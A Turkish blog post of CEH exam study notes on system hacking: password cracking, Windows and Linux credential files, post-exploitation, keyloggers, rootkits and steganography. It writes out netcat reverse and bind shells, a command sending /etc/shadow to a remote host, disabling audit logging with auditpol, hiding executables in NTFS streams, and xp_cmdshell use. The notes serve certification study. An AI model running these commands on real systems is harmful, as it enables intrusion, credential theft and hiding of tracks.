CEH Sertifikasyon Sınavı Notları – 5: System Hacking

Yazarı:
Ertuğrul BAŞARANOĞLU
-
0
2342
views
Bilgi güvenliği konusunda en çok tercih edilen sertifikalardan birisi de Certified Ethical Hacker (CEH) sertifikasıdır. Bu yazıda CEH sınavının konularından birisi olan “System Hacking” başlığı incelenecektir.

 

Pentist: Sızma Testleri ve Bilgi Güvenliği Danışmanlık Hizmetleri

Sistem Ele Geçirme Adımları

Bir sistemi “hack”leme 5 adımda gerçekleşir:

  • Erişim Elde Etme (Gaining Access): Hedefte oturum açmak için bilgi toplanmaya çalışılır. Bu amaçla parolalar dinlenebilir, tahmin edilmeye çalışılır,…
  • Hak Yükseltme (Escalating Privilege): Standart kullanıcı haklarından yönetici hakları elde edilmeye çalışılır. Bu amaçla bilinen zafiyetler, konfigürasyon hataları, parola kırma teknikleri,… kullanılır.
  • Uygulamaların çalıştırılması (Executing Applications): Arka kapılar bırakılır. Bu amaçla özel amaçlı yazılımlar kullanılır.
  • Dosyaları Gizleme (Hiding File): Kullanılan zararlı dosyalar/nesneler gizlenir. Bu amaçla rootkit türü yazılımlar kullanılır.
  • İzleri Silme (Covering Tracks): Yapılan işlemler gizlenmeye çalışılır. Bu amaçla loglar silinebilir.

 

Parola Kırma Teknikleri

  • Brute Force Attack (Kaba Kuvvet Saldırısı): En kesin ve en etkili parola kırma yöntemidir. Ancak yavaştır. Örnek kaba kuvvet saldırıları senaryoları için bakınız: https://www.siberportal.org/tag/brute-force-attack/.
  • Dictionary Attack (Sözlük Saldırısı): En çok kullanılan ifadelerden oluşan bir kaynak (sözlük) ile yapılan parola kırma saldırısıdır. Hızlıdır. PassPhrase kullanılan sistemlerde etkili olduğu söylenemez.
  • Rainbow Attack (Gökkuşağı Saldırısı): Önceden hesaplanmış (pre-computed) özet (hash) değerlerinin kullanılması ile gerçekleştirilen saldırılardır. Gökkuşağı saldırılarından korunmak için, tuzlama kullanılabilir.
  • Hybrid Attack (Hibrid Saldırı): Sözlükteki kelimelere sayı ve sembol eklenerek (Ankara06, Parola123, … gibi) parola kırılır. Hedef de hem kolay parolalar hem de karmaşık parolalar kullanıldığı düşünülüyor ise kullanılabilir.
  • Syllable Attack: Kaba kuvvet ve sözlük saldırılarının kombinasyonudur.
  • Rule-based Attack (Kural Tabanlı Saldırı): Parola hakkında bilgi (2 büyük harf, sonra rakam, sonra 3 küçük harf gibi) varsa kullanılabilir.

Ayrıntılı bilgi için bakınız: http://sankar-information-security.blogspot.com.tr/2012/10/password-cracking-methods-most-password.html

 

Kimlik Bilgisi Saldırıları

4 çeşit parola saldırısı vardır:

  • Çevrimiçi pasif saldırılar: Kullanıcıya hissettirilmeden yapılır. Ağı dinleme, MITM, tekrarlama saldırıları,…
  • Çevrimiçi aktif saldırılar: Otomatik parola tahmin araçları kullanılır. Bu saldırı uzun sürebilir ve geniş band genişliği ister. Bunun yanında kolay bir şekilde tespit edilir.
  • Çevrimdışı saldırılar: Sözlük, hibrid, kaba kuvvet, gök kuşağı gibi yöntemler kullanılır.
  • Teknik olmayan saldırılar: Sosyal mühendislik, omuz smrfü, klavye dinleme,… gibi yöntemler kullanılır.

Kimlik bilgilerini ele geçirme ile ilgili temel notlar aşağıdaki gibidir:

  • Çevrimdışı parola kırma araçları: Cain & Abel, John The Ripper, Hashcat, L0phtcrack
  • Çevrimiçi parola kırma araçları: Medusa, Hydra, Ncrack
  • Diğer parola kırma araçları: Brutus, KerbCrack,… Ayrıntılı bilgi için bakınız: https://www.concise-courses.com/hacking-tools/password-crackers/
  • Ağ üzerinden parola alınamasını zorlaştırmak için SMB Signing, Kerberos kullanılmalıdır.
  • Crunch” aracı ile sözlük oluşturulabilir. Crunch kullanımı ile ilgili ayrıntılı bilgi için bakınız: https://www.siberportal.org/red-team/penetration-testing/creating-wordlists-with-crunch/
  • Pass The Hash (PTH): Windows bir bilgisayara ait parola özeti (LM:NTLM) ile – parolaya gerek olmadan – o bilgisayara erişim sağlanabilir. “Hash Injection” olarak da adlandırılır.
  • Güçlü parola özellikleri aşağıdaki gibi belirlenebilir.
  • DNA (Distributed Network Attack): Parola kırma amacıyla, TCP/IP ile yönetilen ve bir şekilde ele geçirilen bilgisayarların işlemci gücünü kullanan saldırı tekniğidir.
  • Varsayılan parolalar kullanılmamalıdır. Varsayılan parola listesi için bakınız: https://github.com/govolution/betterdefaultpasslist

 

Windows Ortamında Kimlik Doğrulama

  • Windows yerel parolaları SAM ve SYSTEM dosyalarında saklanır. SAM ve SYSTEM dosyası elde edilirse yerel kullanıcıların parola özetleri elde edilebilir. Örnek bir Windows parola özeti “aad3b435b51404eeaad3b435b51404ee:fa320a5cf3d53b4e74bbac73047186f2” şeklindedir.
    • SAM Dosyası: C:\Windows\System32\config\ (veya eski sürümlerde C:\Windows\repair\) dizininde bulunur.
    • SYSTEM Dosyası: C:\Windows\System32\config\ (veya eski sürümlerde C:\Windows\repair\) dizininde bulunur. Bu dosya içerisinde SYSKEY adı verilen SAM dosyasını deşifre etmekte kullanılan 128 bitlik anahtar bulunur.
  • Microsoft etki alanındaki kullanıcıların parola özetleri NTDS.dit ve SYSTEM dosyası ile elde edilebilir.
  • Fiziksel güvenlik atlatılarak Windows işletim sistemi üzerinde yetki elde edilebilir. Bu amaçla kullanılabilecek araçlar: chntpw (parolalar değiştirilebilir, etkinliği değiştirilebilir), bkhive & samdump2, Ophcrack,…
  • Windows ortamında parola özetleri disk üzerinde 2 şekilde saklanır: LM ve NTLM. LM ve NTLM özetleri hakkında ayrıntılı bilgi için bakınız: https://www.siberportal.org/blue-team/securing-windows-operating-system/local-windows-authentication-via-sam-and-system-files-and-lm-ntlm-hashes/
    • LM Özeti: Gökkuşağı saldırıları ile elde edilebilir. Windows Server 2003, Windows XP ve öncesinde kullanılır. Güvenilir olmadığı için Registry Editor ile ayar yapılarak, LM’İn kullanılması devre dışı bırakılmalıdır. 14 karakterden uzun parolalar için LM özeti oluşturulamaz. Adımları:
      • Parolanın tüm karakterleri büyük harfe çevrilir.
      • İlk 14 karakter alınır. Fazlası atılır; eksiği 14 karaktere tamamlanır.
      • 7-7 olmak üzere iki parçaya ayrılır ve sabit bir katar (“KGS!@#$%”) ile DES şifrelemesine sokulur. Eğer parola 8 haneden kısa ise, boş olan ikinci yarının sonucu “AAD3B435B51404EE” olarak elde edilir.
      • İki parça birleştirilir.
    • NTLM Özeti: LM özetine göre daha güvenilirdir. Özetleme algoritması olarak MD4 kullanır.
  • Windows ortamında ağ üzerinden kimlik doğrulaması çeşitli şekillerde sağlanabilir: NTLMv2, Kerberos, Akıllı Kart,…

 

Windows ile İlgili Önemli Notlar

  • Microsoft Baseline Security Analyzer: Microsoft işletim sistemlerinde zafiyetleri tespit eder, güvenlik yapılandırmasını analiz eder.
  • Windows dosya sunucuların en temel problemleri: Eksik yamalar, varsayılan veya kolay parolaların kullanılmasıdır.
  • Parola özetlerini elde etmek için kullanılabilecek araçlar: Cain & Abel, pwdump7, fgdump, L0phtCrack, Ophcrack, Kon-Boot, WCE, Mimikatz,…
  • Fiziksel korumada en etkin yol, tam disk şifrelemedir. Windows tarafından sunulan Bitlocker teknolojisi ise dosya ve disk şifrelenebilir. Bunun yanında EFS ile dosya şifreleme de gerçekleştirilebilir.
  • Cacls.exe: Dosya/Dizin izinlerini ayarlamak için kullanılır.
  • Auditpol.exe: Windows loglama işlemlerinde kullanılır. Loglamayı durdurmak için “auditpol.exe /disable” komutu kullanılabilir.
  • Windows işletim sistemindeki servisler ve portları %windir%\system32\drivers\etc\services dosyasında yazılıdır.
  • Windows işletim sisteminde kalıcılık için “HKCU” veya “HKLM” altındaki “Software\Microsoft\Windows\CurrentVersion\Run” kullanılır.
  • Null User / Null Session: Windows işletim sisteminde kullanıcı adı ve parolası olmayan kullanıcı hesabıdır. Boş oturumlara engel olmak için TCP / UDP 139. ve TCP 445. portlar engellenebilir. Örnek kullanım:
    • net use \\Kurban\IPC$ “” /u:””
    • enum4linux -a KurbanIP
  • GINA (Graphical Identification and Authentication): Windows’ta kimlik doğrulama işleminde görev alır(dı).
  • Windows işletim sisteminde dosya temel olarak 2 yöntemle saklanır: “attrib” komutu ile veya NTFS ADS yöntemi ile.
  • Windows güvenlik duvarının ayarının incelenmesi için komut:
    • netsh firewall show config
  • Windows ortamındaki önemli RID değerleri:
    • 500: Yerleşik Administrator
    • 501: Yerleşik Guest
    • 512: Domain Administrator
    • 1000+: Standart hesaplar
  • Windows işletim sisteminde SID ve SAT kavramları ile ilgili ayrıntılı bilgi için bakınız: https://www.siberportal.org/blue-team/securing-microsoft-domain-environment/security-access-token-sat-concept-in-microsoft-environment/

 

Linux/Unix Ortamında Kimlik Doğrulama

  • Linux ortamında kullanıcı detayları /etc/passwd ve /etc/shadow dosyalarında tutulur.
  • “root” kullanıcısı (veya ID değeri “0” olan kullanıcı) en yetkili kullanıcıdır.
  • /etc/passwd Dosyası: Kullanıcıların temel bilgilerini içerir.
    • Bu dosyanın erişim yetkileri varsayılan olarak 644 (rw-r–r–) şeklindedir. Her kullanıcı bu dosyayı okuyabilir.
    • Dosya 7 kolondan oluşur:
      • Kullanıcı adı
      • Parola bilgisi
        • Günümüzde kullanılmamaktadır. Parola özetleri için /etc/shadow dosyası kullanılır.
      • ID değeri
      • Grup ID değeri
      • Kullanıcı detay bilgileri (tam adı, oda numarası,…)
      • Varsayılan ev dizini
      • Varsayılan kabuğu
        • Not: Varsayılan kabuk değeri geçersiz olan (/bin/false, /usr/sbin/nologin,…) bir kullanıcı sistemde oturum açamaz.
    • Örnek kullanıcı bilgileri:
      • root:x:0:0:root:/root:/bin/bash
      • postgres:x:124:130:PostgreSQL administrator,,,:/var/lib/postgresql:/bin/sh
      • guvenlik:x:1000:1001:,,,:/home/guvenlik:/bin/false
  • /etc/shadow Dosyası: Kullanıcı parolalarının şifrelenmiş/özetlenmiş hali bulunur.
    • Bu dosyanın erişim yetkileri varsayılan olarak 640 (rw-r—–) şeklindedir. Sadece “root” kullanıcısı (dosya sahibi) ve grubundakiler bu dosyayı okuyabilir.
    • Dosya 8 kolondan oluşur:
      • Kullanıcı adı
      • Tuzlanmış parola özeti
        • Bu değer “*” ise parola hiç oluşturulmamış, “!” ise hesap kilitlenmiştir. Bu 2 değer var olan kullanıcı ile (/etc/passwd dosyasında geçerli bir kabuğu olsa bile) oturum açılamaz.
        • Parola verilmişse, bu kolon, “$” karakterine göre 3 kolondan oluşur. İlk kolon parolanın algoritmasına ait kodu, ikinci kolon tuz değerini, üçüncü kolon ise parolanın belirtilen tuz ve algoritma ile işleme konmuş halini belirtir.
      • Parolanın en son değiştirildiği tarih
      • Parolanın en yakın değiştirilebilme tarihi
      • Parolanın en son değiştirmeye zorlanacağı tarih
      • Parola değişikliği için uyarı günü
      • Kullanım sonrasında hesabın kilitleneceği gün
      • Hesabın kilitleneceği tarih
      • Ek alan
    • Örnek kullanıcı bilgileri:
      • root:$6$LgoQb.4L$jxvxN9Pb5Xae.5VNIJTJDOYg6jbpOPGPb5.L4C5tESiY9pYDhYuRHPQLRo5bFpToLa6XhisWm4zSxOSwMkFsh.:17034:0:99999:7:::
      • postgres:*:16820:0:99999:7:::
      • mysql:!:16820:0:99999:7:::
      • guvenlik:$6$yTz9omdM$0vnONhz1bvAHPsyLqrVvHJ0Xm.lKVULo/WpTY2Ix1ksdaGVMyXnomKi8Oz4WzcXKun5zwYqwiP1jH1EOe8Mug1:17034:0:99999:7:::
    • Kullanılan özetleme/şifreleme teknikleri aşağıdaki gibidir.
      • $0: DES
      • $1: MD5
      • $2a: Eski Blowfish
      • $2: Blowfish
      • $5: SHA-256
      • $6: SHA512
    • Bu algoritmalar PAM adlı modül ile (/etc/pam.d/,the system-auth file veya authconfig) /etc/security/ altında ayarlanabilir.
  • Parola değişikliği için “/usr/bin/passwd” aracı kullanılabilir. Bu dosyanın erişim yetkileri varsayılan olarak 4755 (-rwsr-xr-x) şeklindedir. Bu dosyada SUID biti etkin olduğu için, her kullanıcı kendi parolasını sıfırlayabilir.

Linux/Unix ortamında kimlik doğrulama ile ilgili ayrıntılı bilgi için bakınız: http://blog.btrisk.com/2016/09/kali-linux-kullanici-yonetimi.html

 

Linux/Unix ile İlgili Önemli Notlar

  • Ücretsiz Linux Dağıtımları: Knoppix, Ubuntu, Gentoo, Mint…
  • Ücretli Linux Dağıtımları: Red Hat, Debian, Mandrake, SUSE,…
  • Linux’ta bir prosesi arka planda çalıştırmak için sonuna ampersand (&) karakteri eklenir.
  • Linux lsof aracı: Prosesleri ve bu prosesi çalıştıran kullancıyı listeler.
  • Cygwin: Windows altında çalışan Linux/Unix simülatörüdür.
  • Temel linux komutları için bakınız: https://www.siberportal.org/blue-team/securing-linux-operating-system/basic-linux-commands/
  • Linux sistemlerdeki “bash_history”, “mysql_history” gibi dosyalardan kritik bilgiler elde edilebilir.
  • Linux’ta gizli dosya oluşturmak için dosya adının başına nokta (.) karakteri eklenir.

 

Önemli Zafiyetler

  • Shellshock Bash Zafiyeti: Linux/Unix sistemlerinin kabuğunda (GNU bash) uzaktan kod çalıştırmaya yarayan bir zafiyettir. 2014 Eylül ayında açıklanmıştır. Bash güncellemesi ile bu zafiyet giderilebilmektedir. Ayrıntılı bilgi için bakınız: http://www.endersys.com.tr/blog/2014/10/02/shellshock-cve-2014-6271-zafiyeti-ve-zafiyetin-giderilmesi/
  • OpenSSL Heartbleed Zafiyeti: Nisan 2014’te OpenSSL kütüphanesinde olduğu duyurulan ve bellekteki bazı bilgilerin (sertifikalara ait özel / private anahtar dahil) alınabildiği açıklıktır. Ayrıntılı bilgi için bakınız: http://www.kayhankayihan.com/openssl-heartbleed-zafiyeti-ve-bugfix/
  • Su Kaynağı (Water Hole) Saldırısı: Hedef kurumun sistemine, başka bir sistem üzerinden saldırma tekniğidir. Bu amaçla, ilk adımda hedef kurumun kullanıcılarının en çok kullandığı dış siteler veya kurumun sistemlerinin kullandığı dış kaynaklar tespit edilir. İkinci adım olarak bu dış kaynaklara zararlı yazılım bulaştırılır. Son olarak da asıl hedefte olan kurumun dış kaynaktan bu zararlı yazılımı alması beklenir. Ayrıntılı bilgi için bakınız: https://www.mertsarica.com/su-kaynagi-saldirisi/

 

Post Exploitation

  • Sistem ele geçirildiğinde, saldırganın yaptığı ilk işlemlerden birisi; loglamayı devre dışı bırakmaktır. Ancak bu durumun bir alar oluşturması
  • Hak yükseltme işlemleri yatay veya dikey olabilir. Yatay hak yükseltme adımında benzer yetkideki kullanıcının (standart kullanıcı,…) hakları elde edilerek kaynaklara erişim denenir. Dikey hak yükseltme adımında daha yetkili kullanıcı hakları (Doman Admin, Administrator, SYSTEM, root gibi) elde edilir.
  • Hak yükseltme saldırılarına karşı en iyi önlemler:
    • Çoklu kimlik doğrulamak
    • Yetki kontrolü sağlamak
    • Servislerin en az yetkiler ile çalıştırılmasını sağlamak
    • Sistemleri ve uygulamaları güncellemek
    • Uygulamaları periyodik olarak test etmek
    • Kritik dosyaları şifreli saklamak
  • Pivoting: Saldırgan tarafından erişilemeyen ancak ele geçirilen bilgisayar tarafından erişilebilen bir ağa erişim sağlamaktır. Bu amaçla, ele geçirilmiş bir bilgisayardaki Meterpreter bağlantısında “route” eklenebilir. Pivoting işlemleri ile ilgili ayrıntılı bilgi için bakınız: https://www.siberportal.org/tag/pivoting/
  • Saldırılarda tünelleme kullanılarak tespit edilme olasılığı düşürülür. Tünelleme ile DNS, HTTP veya HTTPS gibi izin verilen bir protokol içerisinden veri kaçırılabilir veya ters bağlantı kurulabilir. En çok kullanılan yöntemlerden birisi de aktif cihazlara yakalanmamak için SSH ile tünel kurarak tarama yapmaktır. Bunun yanında TOR ağına bağlı iken de taramalar / saldırılar yapılabilmektedir.
  • Netcat (ncat, nc): Netcat trafiği açık metindir, şifreli değildir. Trafiği şifreli olarak akması için Cryptcat aracı kullanılabilir.  Saldırganın İsviçre Çakısı ( Hackers’ Swiss Army Knife) olarak da ifade edilir. Ayrıntılı bilgi için bakınız: http://www.teknikblog.org/netcat-kullanimi. Kullanım amaçları:
    • Dinleme & Bağlantı Kurma
      • Dinleyen: nc.exe -nlvp 12345
      • Bağlanan: nc -nv 10.10.10.10 12345
    • Bind bağlantı
      • Dinleyen (Kurban): nc.exe -nlvp 24680 -e cmd.exe
      • Bağlanan (Saldırgan): nc -nv 192.168.234.131 24680
    • Ters bağlantı
      • Dinleyen (Saldırgan): nc.exe -nlvp 11223
      • Bağlanan (Kurban): nc -nv 10.10.10.10 11223 -e /bin/bash
    • Şifreli Bind bağlantı
      • Dinleyen (Kurban): ncat –exec cmd.exe –allow 10.10.10.10 -vnl 8443 –ssl
      • Bağlanan (Saldırgan): ncat -v 172.16.5.5 8443 –ssl
    • Veri transferi
      • Gönderici – 1: cat /etc/shadow | nc 192.168.234.129 13579 VEYA nc -nv 192.168.234.129 13579 < /etc/shadow
      • Alıcı – 1: nc.exe -nlvvp 13579 > C:\ShadowDosyasi.txt
      • Gönderici – 2: (ipconfig & net user) | ncat.exe 10.0.0.5 24680
      • Alıcı – 2: nc -nlvvp 24680 > Bilgiler.txt
    • Ağ taraması gerçekleştirme
      • netcat -u -v -w2 172.30.40.50 159-165
      • nc -nvv -w 1 -z 10.10.10.10 5900-5910
    • Örnek bir POP3 bağlantısı
      • nc -nv 10.5.5.5 110
        (UNKNOWN) [10.5.5.5] 110 (pop3) open
        +OK POP3 server lab ready <00005.923734@egitim>
        USER deneme
        +OK deneme welcome here
        PASS Aa123456
        -ERR unable to lock mailbox
        quit
        +OK POP3 server lab signing off.
  • MS ortamında hak yükseltme ile ilgili zafiyetler için bakınız: https://github.com/jbarcia/priv-escalation/blob/master/MS_privesc_and_exploits_table.csv

 

Uygulamaların Çalıştırılması (Executing Applications)

Bu adımda keylogger, trojan, spyware, cracker, arka kapı,… türü yazılımlar veya özel amaçlı uygulamalar (RemoteExec, DameWare,…) kullanılır.

  • Keylogger: Yazılımsal veya donanımsal olabilir. Donanımsal olanlar AV veya Antispyware gibi ürünler tarafından tespit edilemezler. Kabiliyetleri aşağıdaki gibi olabilir:
    • Hedefli olarak veya tüm yazılan klavye bilgilerini kaydeder.
    • Periyodik olarak veya özel bir eylem olduğunda (mouse ile işlem yapıldığında,…) ekran görüntüsü alır.
    • Mailleşmeleri, sohbetleri,… kaydeder.
    • Kayıt bilgileri şifreli bir kanal üzerinden saldırgana yollanabilir.
  • Spyware: Genellikle indirilen programlardan bulaşır. Kabiliyetleri aşağıdaki gibidir:
    • Kurbanın işlemlerini (mail adresi, parola, kart bilgileri, girdiği siteler, sohbetler, internet/yazıcı aktivitelerini, ses kayıtlarını, telefon konuşmalarını, GPS lokasyonunu…) çeşitli yollarla (ekran görüntüsü vs) kaydedip saldırgana yollar.
    • Kendini (Dosyalarını, prosesini…) gizler.
    • Reklam amaçlı pop-up çıkarır veya yönlendirme yapar.
    • Browser’ın ana sayfasını değiştirir, bookmark ekler.
    • Masaüstü kısayollarını, güvenlik duvarı ayarlarını,… değiştirir.
    • Çocuklarının yaptıklarını izlemek isteyen ebeveynler için, çocukların yaptığı işlemler izlenebilir, web site içerikleri kısıtlanabilir.

 

Dosyaları Gizleme (Hiding File):

  • Rootkit: Saldırganın istediğinde bağlantı kurması için kullanılan; proses/dosya gizlemeye yarayan, legal yazılımları zararlı yazılımlarla değiştiren, amacına göre klavye girdilerini dinleyebilen arka kapılardır.
  • ADS (NTFS Alternate Data Stream): Bir dosyanın içeriğini değiştirmeden içerisine kod enjekte etmeye (arka kapı oluşturmaya) yarar. Exe dosyasını TXT dosyasına gizlemek için “type Virus.exe > C:\Test.txt:Virus.exe”; TXT dosyasını DLL’e gizlemek için “copy secret.txt c:\public.dll:secret.txt” kullanılabilir. Böylece zararlı bir yazılım (Virus.exe), bir metin dosyası içerisine atılmış olur. Zararlı uygulamayı başlatmak için “start C:\Test.txt:Virus.exe” komutu çalıştırılabilir. Zararlı yazılımı metin dosyasından çıkarmak için “cat C:\Test.txt:Virus.exe > Virus.exe” komutu (“cat”, Windows Server 2003 Resource Kit aracıdır) kullanılabilir. Bir dizinde ADS ile gizlenmiş dosya tespit etmek için “dir /R | find “:$D”” kullanılabilir. Ayrıntılı bilgi için bakınız: http://www.ismailsaygili.com.tr/2013/04/ads-ile-veri-gizleme-steganography-teknigi.html
  • Steganography: Resim, video, doküman, ses dosyası, klasör,… gibi bir nesnelerin içerisine veri gizleme tekniğidir. Şifreleme tekniği/algoritması değildir, gizleme tekniğidir. Bu teknik ‘security through obscurity’ (bilinmezliğin/karanlığın güvenliği/gizliliği) sağlar. Satır sonuna boşluklar (white space) eklenerek yapılan türüne Snow adı verilir.

 

Araçlar

  • Saldırı Araçları: Metasploit Framework, Core Impact (Python ile yazılmıştır), Immunity Canvas (Python ile yazılmıştır), ExploitPack, Armitage,…vb. Metasploit Framework ile ilgili ayrıntılı bilgi için bakınız: https://www.siberportal.org/red-team/penetration-testing/introduction-to-metasploit/
  • Exploit-db.com: İstismar kodlarının bulunduğu veritabanıdır.
  • USB Dumper: USB içerisindeki bilgileri gizlice çalmaya/kopyalamaya yarayan araçtır
  • Zafiyet tarayıcıları ile işletim sistemi ve uygulamaların zafiyetleri tespit edilebilir, denetimler (compliance) gerçekleştirilebilir.
  • Zafiyet Tespit Araçları: Nessus (en iyisi denebilir), MBSA (Microsoft Baseline Security Analyzer), OpenVAS,…
  • Nessus: Zafiyet taraması ve denetim amacıyla kullanılır. Ayrıca, PCI-DSS’in 11. Gereksinimi (“Güvenlik sistemlerini ve süreçlerini düzenli olarak test edin”) için de kullanılabilir. NASL (Nessus Attacking Scripting Language) ile eklenti yazılabilir.
  • Nessus’ta çok fazla trafik oluşursa, paralel bağlantı sayısı azaltılabilir.

 

Genel Notlar

  • Bir saldırı sırasında kullanılan eylemlere Payload adı verilir. MSF tarafından sunulan Payload modülleri ile ilgili ayrıntılı bilgi için bakınız: https://www.siberportal.org/red-team/penetration-testing/metasploit-fundamentals-payload-modules/
  • En Az Yetki (Least Privilege) Prensibi: Sadece işi yapmak için gerekli olan yetkilerin verilmesidir. Örneğin bir uygulamayı/servisi çalıştıran kullanıcı hesabının sadece o işi yapmak için gerekli yetkilere sahip olmasıdır. Böylece bir sunucu ele geçirilse bile, o kullanıcının belli dizinde okuma yetkisi varsa, sadece o dizinde okuma işlemi yapabilir (o dizine yazamaz, başka dizini okuyamaz).
  • Erişim Yayılımı (Access Creep): Departman değiştiren kullanıcıya, yeni yetkileri eklenirken, eski yetkilerinin alınmaması ve gereğinden fazla erişime sahip olmasıdır.
  • Statik NAT: Bire-bir eşleşme sağlar (one-to-one mapping).
  • PAT: Çok’a bir (1-n) eşleşme. İç ağdaki bir çok IP adresinin dışarıda tek bir karşılığı vardır.
  • NAT/PAT ile sağlıklı çalışmayan protokoller: IPSEC VPN, H323, FTP, IRC. IPSec için NAT-T geliştirilmiştir.
  • Defense in Depth: IT sistemlerini koruma amacıyla çok katmanlı (SW, DMZ, güvenlik duvarı / IDS / IPS / WAF, AV, NTFS…) bir yapı kurmaktır.
  • Bir sistem saldırıya uğramışsa, ilk işlem saldırı hakkında olabildiğince fazla bilgi elde etmeye çalışmaktır.
  • Bir sistem yedekten dönülürken tape içeriğinin hepsinin geri döndürüldüğünden emin olunması için Tam Geri Döndürülmesi (Full Restore) gerekir.
  • Yedeklerin farklı bir lokasyonda fiziksel ve sayısal güvenlik önlemleri alınmış bir şekilde saklanması gereklidir. Yedekleme ile ilgili ayrıntılı bilgi için bakınız: https://www.siberportal.org/blue-team/securing-microsoft-domain-environment/backup-strategy-on-microsoft-environment/
  • Sistem yöneticisi, şüpheli bir olay anında olabildiğince log/kanıt/kayıt toplamalı ve kurum politikasına göre atması gereken adımları atmalıdır.
  • C++ ile yazılmış bir istismar kodunun derlenmesi:
    • g++ istismarKodu.cpp -o ZararliUygulama.exe
  • MSSQL’de işletim sisteminde kod çalıştırmak için xp_cmdshell fonksiyonu kullanılabilir. Örneğin;
    • exec master..xp_cmdshell ‘net user’ > test.txt
  • MSSQL veritabanına yönelik saldırılar için bakınız: https://www.siberportal.org/category/red-team/mssql-database-penetration-tests/ ve http://www.slideshare.net/bgasecurity/microsoft-sql-server-sizma-ve-gvenlk-test-alimalari
  • Hosts dosyalarında (Linux için /etc/hosts dosyasında Windows için C:\Windows\System32\drivers\etc\hosts dosyasında) DNS kayıtları bulunabilir.
  • Windows’ta salting (tuzlama) yoktur. Linux’ta (/etc/shadow) ise tuzlama gerçekleştirilir.
  • Sıfırıncı Gün (Zero Day) Saldırıları: Geliştiricinin haberi olmadan veya açıklığını kapatmadan yapılan saldırılardır.

 

CEH v9 Eğitimi Konu Başlıkları

  • Information at Hand Before System Hacking Stage
  • System Hacking: Goals
  • CEH Hacking Methodology (CHM)
  • CEH System Hacking Steps
    • Cracking Passwords
      • Password Cracking
      • Types of Password Attacks
      • Non-Electronic Attacks
      • Active Online Attack
        • Dictionary, Brute Forcing and Rule-based Attack
        • Password Guessing
      • Default Passwords
      • Active Online Attack:
        • Trojan/Spyware/Keylogger
        • Example of Active Online Attack Using USB Drive
        • Hash Injection Attack
      • Passive Online Attack
        • Wire Sniffing
        • Man-in-the-Middle and Replay Attack
      • Offline Attack
        • Rainbow Attacks
          • Tools to Create Rainbow Tables: rtgen and Winrtgen
        • Distributed Network Attack
      • Elcomsoft Distributed Password Recovery
      • Microsoft Authentication
      • How Hash Passwords Are Stored in Windows SAM?
        • NTLM Authentication Process
        • Kerberos Authentication
      • Password Salting
      • pwdump7 and fgdump
      • Password Cracking Tools
        • L0phtCrack and Ophcrack
        • Cain & Abel and RainbowCrack
      • Password Cracking Tools
      • Password Cracking Tool for Mobile: FlexiSPY Password Grabber
      • How to Defend against Password Cracking
      • Implement and Enforce Strong Security Policy
      • CEH System Hacking Steps
    • Escalating Privileges
      • Privilege Escalation
      • Privilege Escalation Using DLL Hijacking
      • Privilege Escalation Tool: Active@ Password Changer
      • Privilege Escalation Tools
      • How to Defend Against Privilege Escalation
    • Executing Applications
      • RemoteExec
      • PDQ Deploy
      • DameWare Remote Support
      • Keylogger
        • Types of Keystroke Loggers
        • Hardware Keyloggers
        • Keylogger: All In One Keylogger
        • Keyloggers for Windows
        • Keylogger for Mac: Amac Keylogger for Mac
        • Keyloggers for MAC
    • Spyware
      • Spyware: Spytech SpyAgent
      • Spyware: Power Spy 2014
      • What Does the Spyware Do?
      • Spyware
      • USB Spyware: USBSpy
      • Audio Spyware: Spy Voice Recorder and Sound Snooper
      • Video Spyware: WebCam Recorder
      • Cellphone Spyware: Mobile Spy
      • Telephone/Cellphone Spyware
      • GPS Spyware: SPYPhone
      • GPS Spyware
    • How to Defend Against Keyloggers
      • Anti-Keylogger: Zemana AntiLogger
      • Anti-Keylogger
    • How to Defend Against Spyware
      • Anti-Spyware: SUPERAntiSpyware
      • Anti-Spyware
  • Hiding Files
    • Rootkits
      • Types of Rootkits
      • How Rootkit Works
      • Rootkit
        • Avatar
        • Necurs
        • Azazel
        • ZeroAccess
    • Detecting Rootkits
      • Steps for Detecting Rootkits
      • How to Defend against Rootkits
      • Anti-Rootkit: Stinger and UnHackMe
      • Anti-Rootkits
    • NTFS Data Stream
      • How to Create NTFS Streams
      • NTFS Stream Manipulation
      • How to Defend against NTFS Streams
      • NTFS Stream Detector: StreamArmor
      • NTFS Stream Detectors
    • What Is Steganography?
      • Classification of Steganography
      • Types of Steganography based on Cover Medium
        • Whitespace Steganography Tool: SNOW
        • Image Steganography
        • Least Significant Bit Insertion
        • Masking and Filtering
        • Algorithms and Transformation
        • Image Steganography: QuickStego
        • Image Steganography Tools
        • Document Steganography: wbStego
        • Document Steganography Tools
        • Video Steganography
        • Video Steganography: OmniHide PRO and Masker
        • Video Steganography Tools
        • Audio Steganography
        • Audio Steganography: DeepSound
        • Audio Steganography Tools
        • Folder Steganography: Invisible Secrets 4
        • Folder Steganography Tools
        • Spam/Email Steganography: Spam Mimic
      • Steganography Tools for Mobile Phones
    • Steganalysis
      • Steganalysis Methods/Attacks on Steganography
      • Detecting Text and Image Steganography
      • Detecting Audio and Video Steganography
      • Steganography Detection Tool: Gargoyle Investigator™ Forensic Pro
      • Steganography Detection Tools
  • Covering Tracks
    • Covering Tracks,
    • Disabling Auditing: Auditpol
    • Clearing Logs
    • Manually Clearing Event Logs
    • Ways to Clear Online Tracks
    • Covering Tracks Tool: CCleaner
    • Covering Tracks Tool: MRU-Blaster
    • Track Covering Tools
  • Penetration Testing
    • Password Cracking
    • Privilege Escalation
    • Executing Applications
    • Hiding Files
    • Covering Tracks

 

 

İlişkili Yazılar:
Pentist: Sızma Testleri ve Bilgi Güvenliği Danışmanlık Hizmetleri

Benzer YazılarYAZARIN DİĞER İÇERİKLERİ

CEVAP VER

Yorumunuzu giriniz
İsminizi giriniz

Bu site, istenmeyenleri azaltmak için Akismet kullanıyor. Yorum verilerinizin nasıl işlendiği hakkında daha fazla bilgi edinin.